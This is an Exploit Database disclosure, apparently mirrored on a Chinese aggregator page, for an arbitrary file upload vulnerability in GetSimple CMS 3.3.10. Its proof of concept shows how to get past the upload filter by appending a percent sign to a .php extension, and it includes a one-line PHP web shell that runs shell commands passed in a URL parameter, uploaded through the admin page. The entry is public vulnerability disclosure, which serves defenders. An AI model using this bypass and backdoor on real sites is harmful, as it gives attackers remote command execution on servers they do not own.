Getsimple CMS 3.3.10 – Arbitrary File Upload

• Exploit Database
• 18 阅读

• 作者： s0nk3y
  日期： 2016-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40008/

• # Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
  # Google Dork: -
  # Date: 23/06/2016
  # Exploit Author: s0nk3y
  # Vendor Homepage: http://get-simple.info/
  # Category: webapps
  # Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
  # Version: 3.3.10
  # Tested on: Ubuntu 16.04 / Mozilla Firefox
  # Twitter: http://twitter.com/s0nk3y
  # Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
  
  Description
  ========================
  
  GetSimple CMS has been downloaded over 120,000 times (as of March 2013). 
  The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises 
  the simplicity yet possible extensibility through plug-ins.
  
  Vulnerability
  ========================
  
  GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability 
  which allows an attacker to upload a backdoor.
  
  This vulnerability is that the application uses a blacklist and whitelist 
  technique to compare the file against mime types and extensions.
  
  Proof of Concept
  ========================
  
  For exploiting this vulnerability we will create a file by adding the percent 
  behind extension.
  1. evil.php% <--- this is simple trick :)
  <?php
  // simple backdoor
  system($_GET['cmd']);
  ?>
  2. An attacker login to the admin page and uploading the backdoor
  3. The uploaded file will be under the "/data/uploads/" folder
  
  Report Timeline
  ========================
  2016-06-23 : Vulnerability reported to vendor
  2016-06-23 : Disclosure